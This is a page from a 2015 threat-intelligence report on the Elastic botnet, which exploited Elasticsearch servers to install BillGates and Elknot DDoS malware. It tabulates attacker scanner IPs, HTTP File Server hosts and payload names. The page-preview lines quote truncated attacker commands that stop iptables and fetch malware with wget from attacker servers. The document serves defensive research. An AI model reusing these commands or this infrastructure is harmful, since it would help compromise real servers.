NTRG_ElasticBotnetReport_06102015

Recommendations

Info

MMD was able to obtain a video tutorial in which an actor demonstrated the deployment system for the attacks 14 ; the clear, step-by-step instructions provided in the video could allow similar attacks to be carried out by even low-skilled attackers with access to the proper tools, which are often available on underground forums. As part of the tutorial, attackers are instructed on how to use the HTTP File Server (HFS) web server 15 for hosting files on a local machine. Without fail, each of the web servers found supporting the Elasticsearch exploitation against Delilah-simulated servers were HFS. The following table provides details on the attack IPs and HFS servers that Novetta observed during April 2015, separated based on shared indicators. The shared indicators form the initial patterns of activity observed by Novetta derived solely from shared infrastructure. ID SCANNER IP DOWNLOAD IP FILE ON SERVER 1 107.160.82.189 119.29.55.190:8084 RedCat3.6.0_ LinuxRmp_Plugins BINARY TYPE SCANNER COUNTRY BILL US CN HFS COUNTRY 2 117.21.174.174 121.43.225.54:80 PowerEnterABC BILL CN CN 120.24.228.240:6954 PowerEnterABC BILL CN CN 3 117.21.176.64 117.21.176.64:4899 http BILL CN CN 4 116.255.179.202 116.255.179.218:8080 xxl (FAILED DL) CN CN 117.41.184.9 117.41.184.9:8088 xxl (FAILED DL) CN CN 5 121.79.133.179 121.79.133.179:443 6 180.97.68.244 180.97.68.244:280 7 183.61.171.225 183.61.171.225:8818 ud BILL CN CN sy BILL CN CN bbs (FAILED DL) CN CN bbbs (FAILED DL) CN CN down ELKNOT CN CN Temp ELKNOT CN CN 8 192.210.53.43 198.13.96.38:7878 wocao ELKNOT US US 9 218.10.17.171 114.215.115.152:8080 alima ELKNOT CN CN 10 219.235.4.22 219.235.4.22:7878 222.186.15.246:8080 11 222.186.15.246 121.42.221.14:666 sos BILL CN CN sas BILL CN CN xiaoqiu BILL CN CN xiao3 ELKNOT CN CN xiao3 ELKNOT CN CN xiaoqiu32 BILL CN CN xiaoqiu BILL CN CN 12 222.186.21.109 222.186.34.177:1315 udp_25000 (FAILED DL) CN CN 222.186.21.109:3435 udp8006 (FAILED DL) CN CN 14 unixfreaxjp. “China ELF botnet malware infection scheme unleashed” https://www.youtube.com/watch?v=xehXHy11M9w&index=1&list=PLSe6fLFf1YDX-2sog70220BchQmhVqQ75 7 November 2014. 15 “HFS - HTTP File Server” http://www.rejetto.com/hfs/?f=intro THE ELASTIC BOTNET REPORT 42
13 222.186.21.120 222.186.21.120:6633 Cmak_32 BILL CN CN 14 222.186.34.70 23.234.25.203:15826 udpg BILL CN US 15 222.186.56.21 23.107.16.6:80 WN (FAILED DL) CN US 2818 UNKNOWN CN US 16 58.218.213.211 58.218.213.211:2568 xudp ELKNOT CN CN Manager BILL CN CN 111.74.239.77:8080 xudp ELKNOT CN CN 17 60.163.21.177 60.163.21.177:6663 18 60.169.75.99 60.169.75.99:3113 ddos2.4 BILL CN CN gsaa BILL CN CN wc1 BILL CN CN wc BILL CN CN 19 61.160.215.111 122.224.48.28:8000 tooles ELKNOT CN CN 20 61.160.232.221 61.160.232.221:9939 ka AES CN CN fd AES CN CN 61.176.223.77:111 zlbq ELKNOT CN CN 61.176.223.77 61.176.223.77:222 zlby ELKNOT CN CN zlbu ELKNOT CN CN 21 61.176.222.160 61.176.222.160:111 zlwanby ELKNOT CN CN zlwanbq ELKNOT CN CN 61.176.222.160:222 zlby ELKNOT CN CN 61.176.220.162:111 zlbsr BILL CN CN 61.176.220.162 61.176.220.162:222 zlbyy ELKNOT CN CN zlwanby ELKNOT CN CN Given that some of the files did not download from their respective HFS web server (marked in the previous table as “FAILED DL”), it is not possible to extract any configuration information from the entirety of the possible samples. But for the samples that Novetta was able to collect, the following C2 information was extracted from 15 of the above patterns: THE ELASTIC BOTNET REPORT 43
Page 1 and 2: THE ELASTIC BOTNET REPORT EXECUTIVE
Page 3 and 4: As a result of the above query, the
Page 5 and 6: Researchers Peter Kálnai and Jarom
Page 7 and 8: If the dropper is executed with 1 a
Page 9 and 10: The CStatBase class captures inform
Page 11 and 12: There are 2 types of messages curre
Page 13 and 14: struct Beacon { } unsigned int dwCP
Page 15 and 16: found, CThreadAttack::ProcessMain e
Page 17 and 18: The following diagram illustrates t
Page 19 and 20: 2.4.1.3 CSubTask.taskType = 0x82: P
Page 21 and 22: It is worth noting that, of all of
Page 23 and 24: The use of a raw network socket pro
Page 25 and 26: The contains a value between CSubT
Page 27 and 28: Structurally, the BillGates binary
Page 29 and 30: CSysTool::SelfInit uses the three s
Page 31 and 32: If the global variable g_bDoBackdoo
Page 33 and 34: Regardless of the communication mod
Page 35 and 36: COMMAND EXPLANATION count 0 Sets th
Page 37 and 38: 3.2.1 BILLGATE’S “NORMAL” DOS
Page 39 and 40: • /bin/netstat • /bin/lsof •
Page 41: getty 15959 root 6u IPv4 1577210 0t
Page 45 and 46: 18 60.169.75.99 60.169.75.99:3113 w
Page 47 and 48: 219.235.4.22 219.235.4.22:7878 sos
Page 49 and 50: m * service iptables stop wget http
Page 51 and 52: wget -O /tmp/wocao http://198.13.96
Page 53 and 54: 4.1.10 INFRASTRUCTURE-TTP CLUSTER J
Page 55 and 56: 1.The bulk of the HFS instances hav
Page 57 and 58: With regards to the targeted port,
Page 59 and 60: While the Elknot malware does not h
Page 61: One common indicator of a BillGates

NTRG_ElasticBotnetReport_06102015

Create successful ePaper yourself

Delete template?

Save as template?